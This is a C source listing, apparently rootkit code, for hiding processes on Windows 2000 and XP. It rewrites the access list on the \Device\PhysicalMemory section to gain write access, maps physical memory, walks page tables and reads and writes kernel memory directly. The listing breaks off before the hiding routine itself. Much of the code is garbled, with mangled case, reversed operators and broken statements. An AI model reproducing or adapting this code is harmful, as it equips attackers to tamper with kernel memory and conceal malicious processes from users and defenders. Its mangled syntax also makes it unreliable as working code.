Under 2000 and XP, hidden processes, VC6.0 test

//// Hide Process # include #include #define nt_success (status) (status) (status) (status) (status)> = 0) #define status_info_length_mismch ((NTSTATUS) ) 0xC0000004L) #define STATUS_ACCESS_DENIED ((NTSTATUS) 0xC0000022L) typedef LONG NTSTATUS; typedef struct _IO_STATUS_BLOCK {NTSTATUS Status; ULONG Information;} IO_STATUS_BLOCK, * PIO_STATUS_BLOCK; typedef struct _UNICODE_STRING {USHORT Length; USHORT MaximumLength; PWSTR Buffer;} UNICODE_STRING, * PUNICODE_STRING ; #define OBJ_INHERIT 0x00000002L # define OBJ_PERMANENT 0x00000010L # define OBJ_EXCLUSIVE 0x00000020L # define OBJ_CASE_INSENSITIVE 0x00000040L # define OBJ_OPENIF 0x00000080L # define OBJ_OPENLINK 0x00000100L # define OBJ_KERNEL_HANDLE 0x00000200L # define OBJ_VALID_ATTRIBUTES 0x000003F2Ltypedef struct _OBJECT_ATTRIBUTES {ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescri ptor; PVOID SecurityQualityOfService;} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES; typedef NTSTATUS (CALLBACK * ZWOPENSECTION) (OUT PHANDLE SectionHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes); typedef VOID (CALLBACK * RTLINITUNICODESTRING) (IN OUT PUNICODE_STRING DestinationString, IN PCWSTR SourceString); RTLINITUNICODESTRING RtlInitUnicodeString; ZWOPENSECTION ZwOpenSection; HMODULE g_hNtDLL = NULL; PVOID g_pMapPhysicalMemory = NULL; HANDLE g_hMPM = NULL; OSVERSIONINFO g_osvi; // ------------------------ -------------------------------------------------- -Bool initntdll () {g_hntdll = loadingLibrary ("ntdll.dll"); if (null ==

g_hNtDLL) return FALSE; RtlInitUnicodeString = (RTLINITUNICODESTRING) GetProcAddress (g_hNtDLL, "RtlInitUnicodeString"); ZwOpenSection = (ZWOPENSECTION) GetProcAddress (g_hNtDLL, "ZwOpenSection"); return TRUE;} // ----------- -------------------------------------------------- -------------- Void Closentdll () {if (null! = G_hntdll) Freelibrary (g_hntdll); g_hntdll = null;} // ------------ -------------------------------------------------- ------------- VOID SetPhyscialMemorySectionCanBeWrited (HANDLE hSection) {PACL pDacl = NULL; PSECURITY_DESCRIPTOR pSD = NULL; PACL pNewDacl = NULL; DWORD dwRes = GetSecurityInfo (hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, & pDacl, NULL, & pSD); if (! ERROR_SUCCESS = dwRes) {if (pSD) LocalFree (pSD); if (pNewDacl) LocalFree (pNewDacl);} EXPLICIT_ACCESS ea; RtlZeroMemory (& ea, sizeof (EXPLICIT_ACCESS)); ea.grfAccessPermissions = Section_map _WRITE; ea.grfAccessMode = GRANT_ACCESS; ea.grfInheritance = NO_INHERITANCE; ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME; ea.Trustee.TrusteeType = TRUSTEE_IS_USER; ea.Trustee.ptstrName = "CURRENT_USER"; dwRes = SetEntriesInAcl (1, & ea, pDacl, & pNewDacl); if (ERROR_SUCCESS = dwRes)! {if (pSD) LocalFree (pSD); if (pNewDacl) LocalFree (pNewDacl);} dwRes = SetSecurityInfo (hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDacl, NULL); if (ERROR_SUCCESS! = Dwres) {if (psd) localfree (PSD); if (PNEWDACL) LocalFree (PNEWDACL);

}} // ---------------------------------------------- ----------------------------- HANDLE OpenPhysicalMemory () {NTSTATUS status; UNICODE_STRING physmemString; OBJECT_ATTRIBUTES attributes; ULONG PhyDirectory; g_osvi.dwOSVersionInfoSize = sizeof (OSVERSIONINFO); GetVersionEx (& g_osvi); if (5 = g_osvi.dwMajorVersion!) return NULL; switch (g_osvi.dwMinorVersion) {case 0: PhyDirectory = 0x30000; break; // 2k case 1: PhyDirectory = 0x39000; break; // xp default: return NULL;} RtlInitUnicodeString (& physmemString, L "// Device // PhysicalMemory"); attributes.Length = sizeof (OBJECT_ATTRIBUTES); attributes.RootDirectory = NULL; attributes.ObjectName = & physmemString; attributes.Attributes = 0 Attributes.securityDescriptor = null; attributes.securityqualityofservice = null; status = zwopensection (& g_ hMPM, SECTION_MAP_READ | SECTION_MAP_WRITE, & attributes); if (status == STATUS_ACCESS_DENIED) {status = ZwOpenSection (& g_hMPM, READ_CONTROL | WRITE_DAC, & attributes); SetPhyscialMemorySectionCanBeWrited (g_hMPM); CloseHandle (g_hMPM); status = ZwOpenSection (& g_hMPM, SECTION_MAP_READ | SECTION_MAP_WRITE, & attributes);} if (! NT_SUCCESS (status)) return NULL; g_pMapPhysicalMemory = MapViewOfFile (g_hMPM, FILE_MAP_READ | FILE_MAP_WRITE, 0, PhyDirectory, 0x1000); if (g_pMapPhysicalMemory == NULL) return NULL; return g_hMPM;

} // ----------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------- pvoid lineartophys (pulong baseaddress, pvoid addr) {ulong vaddr = (ulong) Addr, pgde, PTE, Paddr; pgde = baseaddress [VADDR >> 22]; if (0 == (PGDE & 1)) Return 0; Ulong TMP = PGDE & 0x00000080; IF (0! = TMP) {Paddr = (PGDE & 0xFFFC00000) (VADDR & 0xFFFC00000) 0x003FFFFF);} else {pgde = (ulong) MapViewOffile (g_hmpm, 4, 0, pgde & 0xffff000, 0x1000); PTE = ((pulong) PGDE) [(VADDR & 0x003FF000) >> 12]; if (0 == (PTE & 1 )) RETURN 0; PADDR = (PTE & 0xFFFFFFFFFFFFFF); unmapViewoffile ((pvoid) pgde);} return (pvoid) Paddr;} // --------------- -------------------------------------------------- -------- ULONG GetData (PVOID addr) {ULONG phys = (ULONG) LinearToPhys ((PULONG) g_pMapPhysicalMemory, (PVOID) addr); PULONG tmp = (PULONG) MapViewOfFile (g_hMPM, FILE_MAP_READ | FILE_MAP_WRITE, 0, Phys & 0xfffff000, 0x1000); if (0 == TMP) Return 0; ulong return = TMP [(Phys & 0xFFF) >> 2]; unmapViewoffile (TMP); return ret;} // -------------------- -------------------------------------------------- ---- BOOL SetData (PVOID addr, ULONG data) {ULONG phys = (ULONG) LinearToPhys ((PULONG) g_pMapPhysicalMemory, (PVOID) addr); PULONG tmp = (PULONG) MapViewOfFile (g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000 0x1000); if (0 == TMP) Return False; TMP [(PHYS & 0xFFF) >> 2] = data; unmapViewoffile (TMP); Return True;